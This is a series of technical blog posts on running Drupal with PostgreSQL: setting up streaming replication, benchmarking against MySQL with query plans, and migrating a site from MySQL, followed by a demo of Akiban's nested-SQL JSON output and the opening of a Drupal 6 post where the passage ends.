First, I installed PostgreSQL 9.1 on my master server along with Drupal 7.12 The steps taken to install and configure Drupal with PostgreSQL 9.1 on my master server are outlined in this gist. Then I installed PostgreSQL 9.1 on another server that will serve as a slave. My initial setup on the slave was quite simple and only involved a basic install and nothing else. The following commands were all I executed on the slave server to get a base PostgreSQL install:

sudo apt-get install python-software-properties
sudo add-apt-repository ppa:pitti/postgresql
sudo apt-get update
sudo apt-get install postgresql-9.1 libpq-dev postgresql-contrib-9.1

Once the basic Drupal install was up and running on the master and the slave server has a basic PostgreSQL install, I started on configuring replication. Replication in general is documented in depth in the online PostgreSQL documentation. In this post, I will be configuring streaming replication which allows a slave server to service read queries.

The steps that need to be performed to configure streaming replication are (I will cover how to perform each step):

create a replication user for slaves to connect with
enable continuous archiving on the master
configure the master to allow remote connections with the replication user
take a base backup to be used for setting up a slave
set up a file-based log-shipping slave

The first step is to create a user for replication on the master:

sudo su postgres
psql
create role repl replication login password 'repl';

Next, the master needs to be have continuous archiving enabled. This is achieved by editing the /etc/postgresql/9.1/main/postgresql.conf file on the master and ensuring the following parameters are set:

wal_level = hot_standby
max_wal_senders = 3 # limits number of concurrent connections from standby
listen_addresses = '0.0.0.0'
archive_mode = on
archive_command = 'test ! -f /mnt/postgres/archivedir/%f && cp %p /mnt/postgres/archivedir/%f'

Now to allow remote connections for the replication user, the /etc/postgresql/9.1/main/pg_hba.conf file on the master server needs to have an entry like (this assumes the slave server I have configured has the IP address 10.39.111.10):

host  replication   repl 10.39.111.10/32      md5

Once the above modifications have been mode, we need to restart the PostgreSQL service:

sudo service postgresql restart

The master is now configured. Next we go to the slave server to take a base backup using pg_basebackup along with configuring the slave to use this base backup for its data directory:

sudo service postgresql stop
sudo mv /var/lib/postgresql/9.1/main/ /var/lib/postgresql/9.1/orig_main
sudo su postgres
pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h master_server -p 5432 -U repl -W
sudo ln -s /etc/ssl/certs/ssl-cert-snakeoil.pem /var/lib/postgresql/9.1/main/server.crt
sudo ln -s /etc/ssl/private/ssl-cert-snakeoil.key /var/lib/postgresql/9.1/main/server.key

The pg_basebackup command should result in output similar to the following:

postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$ pg_basebackup -D /var/lib/postgresql/9.1/main/ -P -h 10.76.241.129 -p 5432 -U repl -W
Password: 
WARNING:  skipping special file "./server.key"
WARNING:  skipping special file "./server.crt"
WARNING:  skipping special file "./server.key"
WARNING:  skipping special file "./server.crt"
1403786/1403786 kB (100%), 1/1 tablespace
NOTICE:  pg_stop_backup complete, all required WAL segments have been archived
postgres@ip-10-39-111-9:/etc/postgresql/9.1/main$

Next, we configure the slave to be a hot standby and to allow remote client connections (since Drupal will be connecting to the slave). This is done by editing the /etc/postgresql/9.1/main/postgresql.conf file on the slave to have the following entries:

hot_standby = on
listen_addresses = '0.0.0.0'

To allow the drupal user to connect from the master server (where apache is running), modify the /etc/postgresql/9.1/main/pg_hba.conf file on the slave (assuming 10.76.241.129 is IP address of master):

host  drupal drupal 10.76.241.129/32      md5

Next, create a recovery.conf file in the PostgreSQL data directory on the slave server:

sudo touch /var/lib/postgresql/9.1/main/recovery.conf
sudo chown postgres:postgres /var/lib/postgresql/9.1/main/recovery.conf

The following should be placed in the recovery.conf file (assuming 10.76.241.129 is IP address of master):

standby_mode = 'on'
primary_conninfo = 'host=10.76.241.129 port=5432 user=repl password=repl'

The PostgreSQL service on the slave server is now ready to be started again:

sudo service postgresql start

If everything worked correctly, log entries indicating replication is running should be present. For example, on my slave server my log file had entries like:

ubuntu@ip-10-39-111-9:/var/log/postgresql$ sudo tail -n 5 /var/log/postgresql/postgresql-9.1-main.log 
2012-07-07 22:06:50 UTC LOG:  streaming replication successfully connected to primary
2012-07-07 22:06:50 UTC LOG:  incomplete startup packet
2012-07-07 22:06:50 UTC LOG:  redo starts at 1/15000020
2012-07-07 22:06:50 UTC LOG:  consistent recovery state reached at 1/16000000
2012-07-07 22:06:50 UTC LOG:  database system is ready to accept read only connections
ubuntu@ip-10-39-111-9:/var/log/postgresql$

Now, Drupal running on the master server is ready to be configured to use a PostgreSQL slave for read-only queries! The settings.php file for the Drupal site needs to be updated to know about this slave database. My settings.php file looked like (10.39.111.10 is IP address of slave server):

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '5432',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
    'slave' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => '10.39.111.10',
      'port' => '5432',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
  ),
);

I would suggest enabling query logging on the slave server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the /etc/postgresql/9.1/main/postgresql.conf file to have these entries:

logging_collector = on
log_directory = 'pg_log'
log_statement = 'all'

Query log files will then be generated in the /var/lib/postgresql/9,1/main/pg_log directory.

By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to the slave server. The search module can be access from your drupal site by going to http://your.ip.address/drupal/?q=search

Try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the slave server when issuing content searches.

That’s about it for this post. Once replication is configured in PostgreSQL, having Drupal send queries to the slave is pretty straightforward.

Comparing PostgreSQL 9.1 vs. MySQL 5.6 using Drupal 7.x

2012-06-29T00:00:00-07:00

Its tough to come across much information about running Drupal on PostgreSQL I find beisdes the basics of installing Drupal on PostgreSQL. In particular, I’m interested in comparisons of running Drupal on PostgreSQL versus MySQL. Previous posts such as this article from 2bits compares performance of MySQL versus PostgreSQL on Drupal 5.x and seems a bit outdated. This post from the high performance drupal group is also pretty dated and has some information with similar comparisons.

In this post, I wanted to run similar tests to what was done in the article from 2bits but on a more recent version of Drupal - 7.x. I also wanted to test out a few more complex queries that can get generated by the view module and see how they perform in MySQL versus PostgreSQL.

For this post, I used the latest GA version of PostgreSQL and for kicks, I went with an aplha release of MySQL - 5.6. I would expect to see similar results for 5.5 in tests like this. I didn’t use default configurations after installation since I didn’t see much benefit in testing that. The configurations I used for both systems are documented below.

Environment Setup

All results were gathered on EC2 instances. The base AMI used for these results is an official AMI of Ubuntu 10.04 provided by Canonical. The particular AMI used as the base image for the results gathered in this post was ami-0baf7662.

Images used were all launched in the US-EAST-1A availability zone and were large instance types. After launching this base image I installed MySQL 5.6 and Drupal 7.12. The steps I took to install these components along with the my.cnf file I used for MySQL are outlined in this gist.

The PostgreSQL 9.1 setup I performed on a separate instance along with the postgresql.conf settings I used are outlined in this gist.

APC was installed and its default configuration was used on both servers.

Data Generation

I used drush and the devel modules to generate data. I generated the following data:

users	50000
tags	1000
vocabularies	5000
menus	5000
nodes	100000
max comments per node	10

I generated this data in the MySQL installation first. The data was then migrated to the PostgreSQL instance using the dbtng_migrator module. This ensures the same data is used for all tests against MySQL and PostgreSQL. I covered how to perform this migration in a previous post.

pgbouncer

One additional setup item I performed for PostgreSQL was to install pgbouncer and configure Drupal to connect through pgbouncer instead of directly to PostgreSQL.

Installation and configuration on Ubuntu 10.04 is straightforward. The steps to install pgbouncer and the configuration I used are outlined in this gist.

The main reason for this change is the ApacheBench based test unfairly favors MySQL due to its process model. Each connection results in a new thread being spawned whereas with PostgreSQL, each new connection results in a new process being forked. The overhead of forking a new process is much larger than spawning a new thread. I did collect numbers for PostgreSQL without using pgbouncer and I do report them in the ApacheBench test section below.

pgbouncer maintains a connection pool that Drupal connects so in my settings.php file for my Drupal PostgreSQL instance, I modified my database settings to be:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '6432',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
  ),
);

I performed this configuration step after I generated data in MySQL and migrated it to PostgreSQL.

Anonymous Users Testing with ApacheBench

First, loading the front page for each Drupal site with the devel module enabled and reporting on query execution times, the following was reported:

Database	Query Exec Times
MySQL	Executed 65 queries in 31.69 ms
PostgreSQL (with pgbouncer)	Executed 66 queries in 49.84 ms
PostgreSQL	Executed 66 queries in 95 ms

Straight out the gate, we can see there is not much difference here. 31 versus 50 ms is not going to be felt by many end users. If pgbouncer is not used, query execution time is 3 times slower though.

Next, I went to do some simple benchmarks using ApacheBench. The command used to run ab was (the number of concurrent connections, X, was the only parameter varied):

ab -c X -n 100 http://drupal.url.com/

The ab command was always run from a separate EC2 instance in the same availability zone and never on the same instance as which Drupal was running.

Results obtained with default Drupal configuration (page cache disabled) but all other caching enabled are shown in the figure below. The raw numbers are presented in the table after the figure.

Database	c = 1	c = 5	c = 10
MySQL	11.71	16.53	16.28
PostgreSQL (using pgbouncer)	8.44	11.03	11.10
PostgreSQL	4.81	7.32	7.22

The next test was run after all caches were cleared using drush. The command issued was:

drush cc

Option 1 was then chosen to clear all caches. This was done before each ab command was run. Results are shown in the figure with raw numbers presented in the table after the figure.

Database	c = 1	c = 5	c = 10
MySQL	10.50	14.08	6.28
PostgreSQL (using pgbouncer)	7.92	9.23	7.32
PostgreSQL	5	7.04	6.79

Finally, the same test was run with Drupal’s page cache enabled. Results are shown in the figure below with raw numbers presented in the table after the figure.

Database	c = 1	c = 5	c = 10
MySQL	144	282	267
PostgreSQL (using pgbouncer)	120	205	202
PostgreSQL	35	45	46

Views Queries

The views module is known to sometimes generate queries that can cause performance problems for MySQL.

Image Gallery View

The first SQL query I want to look is generated by one of the sample templates that come with the Views module. If you click ‘Add view from template’ in the Views module, by default, you will only have 1 template to choose from - the Image Gallery template. After creating a view from this template and not modifying anything about that view, I see 2 problematic queries being generated.

The first query is a query that counts the number of the rows in the result set for this view since this is a paginated view. The second query actually retrieves the results with a LIMIT clause and the appropriate OFFSET dependending on what page of the results the user is currently on. For this post, we’ll just look at the second query that retries results. That query is:

SELECT taxonomy_index.tid      AS taxonomy_index_tid, 
       taxonomy_term_data.name AS taxonomy_term_data_name, 
       Count(node.nid)         AS num_records 
FROM   node node 
       LEFT JOIN users users_node 
              ON node.uid = users_node.uid 
       LEFT JOIN field_data_field_image field_data_field_image 
              ON node.nid = field_data_field_image.entity_id 
                 AND ( field_data_field_image.entity_type = 'node' 
                       AND field_data_field_image.deleted = '0' ) 
       LEFT JOIN taxonomy_index taxonomy_index 
              ON node.nid = taxonomy_index.nid 
       LEFT JOIN taxonomy_term_data taxonomy_term_data 
              ON taxonomy_index.tid = taxonomy_term_data.tid 
WHERE  (( ( field_data_field_image.field_image_fid IS NOT NULL ) 
          AND ( node.status = '1' ) )) 
GROUP  BY taxonomy_term_data_name, 
          taxonomy_index_tid 
ORDER  BY num_records ASC 
LIMIT  24 offset 0

The response time of the query in MySQL versus PostgreSQL is shown in the figure below.

As seen in the image above, PostgreSQL can execute the query in question in 300ms or less whereas MySQL consistently takes 2800 ms to execute the query.

The MySQL execution plan looks like:

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: field_data_field_image
         type: ref
possible_keys: PRIMARY,entity_type,deleted,entity_id,field_image_fid
          key: PRIMARY
      key_len: 386
          ref: const
         rows: 19165
        Extra: Using where; Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: eq_ref
possible_keys: PRIMARY,node_status_type
          key: PRIMARY
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: users_node
         type: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.node.uid
         rows: 1
        Extra: Using where; Using index
*************************** 4. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_index
         type: ref
possible_keys: nid
          key: nid
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: NULL
*************************** 5. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_term_data
         type: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.taxonomy_index.tid
         rows: 1
        Extra: NULL

MySQL starts from the field_date_field_image table and since there is no selective predicates in the query, chooses to scan the table using the PRIMARY key of the table. It then filters the rows scanned using the field_image_fid IS NOT NULL predicate. Since MySQL only has 1 join algorithm, nested loops, it is used to perform the remainder of the joins. A temporary table is created in memory to store the results of these joins. This is then sorted and the result set limited to the 24 requested.

The PostgreSQL execution plan looks drastically different.

 Limit  (cost=11712.83..11712.89 rows=24 width=20)
   ->  Sort  (cost=11712.83..11829.24 rows=46564 width=20)
         Sort Key: (count(node.nid))
         ->  HashAggregate  (cost=9946.90..10412.54 rows=46564 width=20)
               ->  Hash Left Join  (cost=6174.69..9597.67 rows=46564 width=20)
                     Hash Cond: (taxonomy_index.tid = taxonomy_term_data.tid)
                     ->  Hash Right Join  (cost=6140.19..8922.92 rows=46564 width=12)
                           Hash Cond: (taxonomy_index.nid = node.nid)
                           ->  Seq Scan on taxonomy_index  (cost=0.00..1510.18 rows=92218 width=16)
                           ->  Hash  (cost=5657.14..5657.14 rows=38644 width=4)
                                 ->  Hash Join  (cost=2030.71..5657.14 rows=38644 width=4)
                                       Hash Cond: (node.nid = field_data_field_image.entity_id)
                                       ->  Seq Scan on node  (cost=0.00..2187.66 rows=76533 width=8)
                                             Filter: (status = 1)
                                       ->  Hash  (cost=1547.66..1547.66 rows=38644 width=8)
                                             ->  Seq Scan on field_data_field_image  (cost=0.00..1547.66 rows=38644 width=8)
                                                   Filter: ((field_image_fid IS NOT NULL) AND ((entity_type)::text = 'node'::text) AND (deleted = 0::smallint))
                     ->  Hash  (cost=22.00..22.00 rows=1000 width=12)
                           ->  Seq Scan on taxonomy_term_data  (cost=0.00..22.00 rows=1000 width=12)

PostgreSQL has a number of other join algorithms available for use. In particular, for this query, the optimizer has decided that a hash join is the optimal choice.

PostgreSQL starts by scanning the tiny (1000 rows) taxonomy_term_data table and constructing an in-memory hash table (the build phase in a hash join). It then probes this hash table for possible matches of taxonomy_index.tid = taxonomy_term_data.tid for each row that results from a hash join of taxonomy_index and node. This hash join was a result of the field_data_field_image and node table being join with the field_data_field_image being used to build a hash table and a sequential scan of node being used to probe that hash table. Aggregation is then performed and the result set is then sorted by the aggregated value (in this case a count of node ids). Finally, the result set is limited to 24.

One neat thing about PostgreSQL is planner nodes can be disabled. So to make PostgreSQL execute the query in a similar manner to MySQL, I did:

drupal=> set enable_hashjoin=off;
SET
drupal=> set enable_hashagg=off;
SET
drupal=> set enable_mergejoin=off;
SET
drupal=>

And the execution plan PostgreSQL chose then was:

 Limit  (cost=52438.04..52438.10 rows=24 width=20)
   ->  Sort  (cost=52438.04..52552.82 rows=45913 width=20)
         Sort Key: (count(node.nid))
         ->  GroupAggregate  (cost=50237.67..51155.93 rows=45913 width=20)
               ->  Sort  (cost=50237.67..50352.45 rows=45913 width=20)
                     Sort Key: taxonomy_term_data.name, taxonomy_index.tid
                     ->  Nested Loop Left Join  (cost=0.00..46682.48 rows=45913 width=20)
                           ->  Nested Loop Left Join  (cost=0.00..33783.81 rows=45913 width=12)
                                 ->  Nested Loop  (cost=0.00..18575.38 rows=38644 width=4)
                                       ->  Seq Scan on field_data_field_image  (cost=0.00..1547.66 rows=38644 width=8)
                                             Filter: ((field_image_fid IS NOT NULL) AND ((entity_type)::text = 'node'::text) AND (deleted = 0::smallint))
                                       ->  Index Scan using node_pkey on node  (cost=0.00..0.43 rows=1 width=8)
                                             Index Cond: (nid = field_data_field_image.entity_id)
                                             Filter: (status = 1)
                                 ->  Index Scan using taxonomy_index_nid_idx on taxonomy_index  (cost=0.00..0.36 rows=3 width=16)
                                       Index Cond: (node.nid = nid)
                           ->  Index Scan using taxonomy_term_data_pkey on taxonomy_term_data  (cost=0.00..0.27 rows=1 width=12)
                                 Index Cond: (taxonomy_index.tid = tid)

The above plan takes 2 seconds to execute against PostgreSQL. You can see it is very similar to the MySQL plan. It starts with the field_data_field_image table and performs nested loop joins to join the remainder of the tables. In this case, a sort must be performed before the aggregation that is expensive to perform. Using the HashAggregate operator in PostgreSQL would greatly reduce that cost.

So you can see out of the box, PostgreSQL performs much better on this query.

Simple View

I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen here.

The resulting SQL query that gets executed by this view is:

SELECT DISTINCT node.title                            AS node_title, 
                node.nid                              AS nid, 
                node_comment_statistics.comment_count AS 
                node_comment_statistics_comment_count, 
                node.created                          AS node_created 
FROM   node node 
       INNER JOIN node_comment_statistics node_comment_statistics 
         ON node.nid = node_comment_statistics.nid 
WHERE  (( ( node.status = '1' ) 
          AND ( node.comment IN ( '2' ) ) 
          AND ( node.nid >= '111' ) 
          AND ( node_comment_statistics.comment_count >= '2' ) ))
ORDER  BY node_created ASC 
LIMIT  50 offset 0

The response time of the query in MySQL versus PostgreSQL is shown in the figure below.

As seen in the image above, PostgreSQL can execute the query in question in 200ms or less whereas MySQL can take up to 1000 ms to execute the query.

The MySQL execution plan looks like:

*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         type: index
possible_keys: PRIMARY,node_status_type
          key: node_created
      key_len: 4
          ref: NULL
         rows: 100
        Extra: Using where; Using temporary
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node_comment_statistics
         type: eq_ref
possible_keys: PRIMARY,comment_count
          key: PRIMARY
      key_len: 4
          ref: drupal.node.nid
         rows: 1
        Extra: Using where

MySQL chooses to start from the node table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the DISTINCT). For each distinct row in the temporary table, MySQL then performs a join to the node_comment_statistics table by performing an index lookup using its primary key.

The PostgreSQL execution plan for this query looks like:

 Limit  (cost=6207.15..6207.27 rows=50 width=42)
   ->  Sort  (cost=6207.15..6250.75 rows=17441 width=42)
         Sort Key: node.created
         ->  HashAggregate  (cost=5453.36..5627.77 rows=17441 width=42)
               ->  Hash Join  (cost=1985.31..5278.95 rows=17441 width=42)
                     Hash Cond: (node.nid = node_comment_statistics.nid)
                     ->  Seq Scan on node  (cost=0.00..2589.32 rows=38539 width=34)
                           Filter: ((nid >= 111) AND (status = 1) AND (comment = 2))
                     ->  Hash  (cost=1546.22..1546.22 rows=35127 width=16)
                           ->  Seq Scan on node_comment_statistics  (cost=0.00..1546.22 rows=35127 width=16)
                                 Filter: (comment_count >= 2::bigint)

PostgreSQL chooses to start by scanning the node_comment_statistics table and building an in-memory hash table. This hash table is then probed for possible mathces of node.nid = node_comment_statistics.nid for each row that results from a sequential scan of the node table. The result of this hash join is then aggregated (for the DISTINCT) before being sorted and limited to 50 rows.

Its worth noting that with out of the box settings, the above query would do a disk based sort (sort method is viewable using EXPLAIN ANALYZE in PostgreSQL). When doing a disk based sort, the query takes about 450 ms to execute. I was running all my tests with work_mem set to 4MB though which results in a top-N heapsort being used.

Conclusion

In my opinion, the only issue with using PostgreSQL as your Drupal database is that some contributed modules will not work out of the box with that configuration.

Certainly, from a performance point of view, I see no issues with using PostgreSQL with Drupal. In fact, for Drupal sites using the Views module (probably the majority), I would say PostgreSQL is probably even a better option than MySQL due to its more advanced optimizer and execution engine. This does assume pgbouncer is being used and Drupal is not connecting directly to PostgreSQL. Users who do not use pgbouncer and perform simple benchmarks like the ones I did with ab are likely to see poor performance against PostgreSQL.

I’m working a lot with Drupal on PostgreSQL these days. I’ll be sure to share any interesting experiences I have here.

Migrating Drupal 7 Site from MySQL to PostgreSQL on Ubuntu 10.04

2012-06-26T00:00:00-07:00

I recently needed to migrate a Drupal 7 site running on a MySQL 5.5 database to a PostgreSQL 9.1 database. This brief post describes the steps I took to achieve this. The steps outlined here were only tested on Ubuntu 10.04

First, I installed a fresh copy of PostgreSQL 9.1.

sudo apt-get install python-software-properties
sudo add-apt-repository ppa:pitti/postgresql
sudo apt-get update
sudo apt-get install postgresql-9.1 libpq-dev

After the installation is complete, a schema and user account is created for Drupal.

sudo su postgres
createuser -D -A -P drupal
createdb --encoding=UTF8 -O drupal drupal
exit

The above creates a user account named drupal (you will be prompted for a password for the user account when running the command) and a schema named drupal.

Next, PostgreSQL needs to be configured to allow connections from Apache for Drupal. This is done by modifying the /etc/postgresql/9.1/main/pg_hba.conf file. The following line needs to be commented out or deleted:

local   all             all                                     peer

The line to added in this file is:

host    drupal          drupal          127.0.0.1/32            password

After this file is modified, PostgreSQL needs to be restarted.

sudo service postgresql restart

For the migration, we are going to assume drush is installed on the server we will be performing the migration. We are also going to assume MySQL and PostgreSQL are running on the same server although this is certainly not a requirement for these instructions.

The module that performs the real work of the migration is the dbtng_migrator module. This module is installed in the same manner as any other Drupal module. After the module is installed, the settings.php file for your drupal installation then needs to be modified to point to your source and destination database. In my case, I updated my settings.php file to look like:

$databases = array (
  'default' => array (
    'default' =>
      array (
        'database' => 'drupal',
        'username' => 'drupal',
        'password' => 'drupal',
        'host' => 'localhost',
        'port' => '',
        'driver' => 'mysql',
        'prefix' => '',
      ),
  ),
  'dest' => array (
    'default' =>
      array (
        'database' => 'drupal',
        'username' => 'drupal',
        'password' => 'drupal',
        'host' => 'localhost',
        'port' =>'',
        'driver' => 'pgsql',
        'prefix' =>'',
      ),
    ),
);

As you can see in my case, the default schema that I am currently running on is a MySQL database and I am planning on migrating to a PostgreSQL database running on the same machine.

Now, to perform the migration from the command line using drush, its as simple as:

drush cache-clear drush
drush dbtng-replicate default dest

When the migration finishes, output similar to the following will be seen (this is just a small portion of the output):

$ drush dbtng-replicate default dest
...
cache_update successfully migrated.                    [status]
authmap successfully migrated.                         [status]
role_permission successfully migrated.                 [status]
role successfully migrated.                            [status]
users successfully migrated.                           [status]
users_roles successfully migrated.                     [status]
$

Finally, after the database migration is successfully completed, the settings.php file needs to be updated to point to the new database. In my case, the database settings after my migration looked like:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupal',
      'password' => 'drupal',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'pgsql',
      'prefix' => '',
    ),
  ),
);

That was it for my migration. Granted, I had a small drupal site to migrate and the only additional modules I had installed were the views and devel modules so I did not need to worry about contributed modules working with the PostgreSQL database. Next step would be to be configure PostgreSQL in a more optimal which I did not go in to here.

How Akiban Saves Babies

2012-05-24T00:00:00-07:00

I came across an interesting article from Iggy Fernandez in the NoCOUG journal this month that prompted me to write a short little post showing a little of what we are working on at Akiban. Iggy also has a blog post that is pretty similar to the article.

We are big fans of the relational model and one thing that I loved about Iggy’s article was the re-iteration of the fact that Codd never dictated how data should be stored. Hence, at Akiban we are working on a new relational database that stores data in a different manner that we refer to as table grouping.

In this post, I wanted to briefly show how we could group the schema Iggy used in his article and how that data can be retrieved. Below I show the DDL for the tables as we would create them in Akiban. You will notice the one addition in our DDL is the specification of a grouping foreign key. The DDL below creates a single table group with the employees table as the root and all other tables as children.

create table employees 
(
  emp_no int primary key not null,
  name varchar(16),
  birth_date date
);

create table job_history 
(
  emp_no int not null,
 job_date date not null,
 title varchar(16),
 grouping foreign key (emp_no) references employees
);

create table salary_history 
(
  emp_no int not null,
  job_date date not null,
  salary_date date not null,
  salary decimal,
  grouping foreign key (emp_no) references employees
);

create table children 
(
  emp_no int not null,
  child_name varchar(16) not null,
  birth_date date,
  grouping foreign key (emp_no) references employees
);

insert into employees values (1, 'IGNATIES', '1970-01-01');

insert into children values (1, 'INIGA', '2001-01-01');
insert into children values (1, 'INIGO', '2001-01-01');

insert into job_history values (1, '1991-01-01', 'PROGRAMMER');
insert into job_history values (1, '1992-01-01', 'DATABASE ADMIN');

insert into salary_history values (1, '1991-01-01', '1991-01-02', 1000);
insert into salary_history values (1, '1991-01-01', '1991-01-03', 1000);
insert into salary_history values (1, '1992-01-01', '1992-01-02', 2000);
insert into salary_history values (1, '1992-01-01', '1992-01-03', 2000);

test=> select * from employees;
 emp_no |   name   | birth_date 
--------+----------+------------
      1 | IGNATIES | 1970-01-01
(1 row)

Time: 3.529 ms
test=> select * from children;
 emp_no | child_name | birth_date 
--------+------------+------------
      1 | INIGA      | 2001-01-01
      1 | INIGO      | 2001-01-01
(2 rows)

Time: 4.058 ms
test=> select * from job_history;
 emp_no |  job_date  |     title      
--------+------------+----------------
      1 | 1991-01-01 | PROGRAMMER
      1 | 1992-01-01 | DATABASE ADMIN
(2 rows)

Time: 3.954 ms
test=> select * from salary_history;
 emp_no |  job_date  | salary_date | salary 
--------+------------+-------------+--------
      1 | 1991-01-01 | 1991-01-02  |   1000
      1 | 1991-01-01 | 1991-01-03  |   1000
      1 | 1992-01-01 | 1992-01-02  |   2000
      1 | 1992-01-01 | 1992-01-03  |   2000
(4 rows)

Time: 3.868 ms
test=>

Ok, now we have a simple dataset with 1 employee. In Akiban, all data for that 1 employee is essentially stored pre-joined. I explained previously how we accomplish this in a post on the company blog so I won’t go into detail here.

Now what if I wanted to get all employee information for this person in 1 go? In Iggy’s article, Oracle’s multi-table clustering functionality is used to make sure doing that is efficient and then SQL/XML is used to query it and construct a single XML document with all the employees information.

Well, in Akiban, we’ve implemented support for nested SQL. This allows us to return data as objects instead of returning data in tabular form. We decided to format the objects we return in JSON for our first implementation of this functionality. Now if I want to get all information for employee 1 in a single query with a nested result in JSON format, I simply need to enable that mode in Akiban and issue a query like the one shown below.

select 
  employees.*,
  (select children.* from children where employees.emp_no = children.emp_no),                       
  (select job_history.* from job_history where employees.emp_no = job_history.emp_no),                
  (select salary_history.* from salary_history where employees.emp_no = salary_history.emp_no) 
from 
  employees

Ok, now to enable nested result sets and fire the query off. This is exactly what the interaction with our system will look like.

test=> set OutputFormat = 'json';
SET OutputFormat
Time: 1.290 ms
test=> select 
test->   employees.*,
test->   (select children.* from children where employees.emp_no = children.emp_no),                       
test->   (select job_history.* from job_history where employees.emp_no = job_history.emp_no),                
test->   (select salary_history.* from salary_history where employees.emp_no = salary_history.emp_no) 
test-> from 
test->   employees;
                                                                                                                                                                                                                                                                                                                                         JSON                                                                                                                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 {"emp_no":1,"name":"IGNATIES","birth_date":"1970-01-01","_SQL_COL_1":[{"emp_no":1,"child_name":"INIGA","birth_date":"2001-01-01"},{"emp_no":1,"child_name":"INIGO","birth_date":"2001-01-01"}],"_SQL_COL_2":[{"emp_no":1,"job_date":"1991-01-01","title":"PROGRAMMER"},{"emp_no":1,"job_date":"1992-01-01","title":"DATABASE ADMIN"}],"_SQL_COL_3":[{"emp_no":1,"job_date":"1991-01-01","salary_date":"1991-01-02","salary":"1000"},{"emp_no":1,"job_date":"1991-01-01","salary_date":"1991-01-03","salary":"1000"},{"emp_no":1,"job_date":"1992-01-01","salary_date":"1992-01-02","salary":"2000"},{"emp_no":1,"job_date":"1992-01-01","salary_date":"1992-01-03","salary":"2000"}]}
(1 row)

Time: 12.230 ms
test=>

If you scroll to the right above, you will see the nested result set with all of the information for employee 1. Also notice that we have an easy way to enable/disable nested result set functionality. Setting this format to ‘table’ results in tabular output. The result set above nicely formatted is shown next.

{
    "emp_no": 1,
    "name": "IGNATIES",
    "birth_date": "1970-01-01",
    "_SQL_COL_1": [
        {
            "emp_no": 1,
            "child_name": "INIGA",
            "birth_date": "2001-01-01"
        },
        {
            "emp_no": 1,
            "child_name": "INIGO",
            "birth_date": "2001-01-01"
        }
    ],
    "_SQL_COL_2": [
        {
            "emp_no": 1,
            "job_date": "1991-01-01",
            "title": "PROGRAMMER"
        },
        {
            "emp_no": 1,
            "job_date": "1992-01-01",
            "title": "DATABASE ADMIN"
        }
    ],
    "_SQL_COL_3": [
        {
            "emp_no": 1,
            "job_date": "1991-01-01",
            "salary_date": "1991-01-02",
            "salary": "1000"
        },
        {
            "emp_no": 1,
            "job_date": "1991-01-01",
            "salary_date": "1991-01-03",
            "salary": "1000"
        },
        {
            "emp_no": 1,
            "job_date": "1992-01-01",
            "salary_date": "1992-01-02",
            "salary": "2000"
        },
        {
            "emp_no": 1,
            "job_date": "1992-01-01",
            "salary_date": "1992-01-03",
            "salary": "2000"
        }
    ]
}

Now there is no reason we could not decide to write an XML outputter in the future. JSON is what we have gone with at the moment because we all like JSON here and we have a few people who are not such big fans of XML.

Since this is nested SQL, I can just select what I want and filter the result set using predicates. Lets say I only want birth dates of children named ‘INIGA’ and salary history and job information for ‘DATABASE ADMIN’ role. I can also give aliases to anything in my SELECT clause.

I could write a query like the following:

select 
  employees.*,
  (select children.birth_date from children where employees.emp_no = children.emp_no and child_name = 'INIGA') as children, 
  (select job_history.job_date from job_history where employees.emp_no = job_history.emp_no and title = 'DATABASE ADMIN') as job, 
  (select salary_history.salary from salary_history where employees.emp_no = salary_history.emp_no and job_date = '1992-01-01') as salary
from 
  employees

The above query would return a result set like (after formatting):

{
    "emp_no": 1,
    "name": "IGNATIES",
    "birth_date": "1970-01-01",
    "children": [
        {
            "birth_date": "2001-01-01"
        }
    ],
    "job": [
        {
            "job_date": "1992-01-01"
        }
    ],
    "salary": [
        {
            "salary": "2000"
        },
        {
            "salary": "2000"
        }
    ]
}

Thats all I wanted to touch on in this post but I aim to write a different post comparing table-grouping with Oracle multi-table clusters in the future. However, we do have a short piece of text discussing the difference on our Zendesk portal.

Our nested SQL quickstart guide also has examples of this functionality if you are interested in seeing more. In that quick-start, we use the employees sample database from MySQL.

Using Akiban Server with Drupal 6

2012-05-18T00:00:00-07:00

In my previous post, I mentioned I’m working on a database driver for Drupal 7 for the Akiban Server. However, we have some clients who use Drupal 6 so I wanted to talk about how we work with those clients in this post.

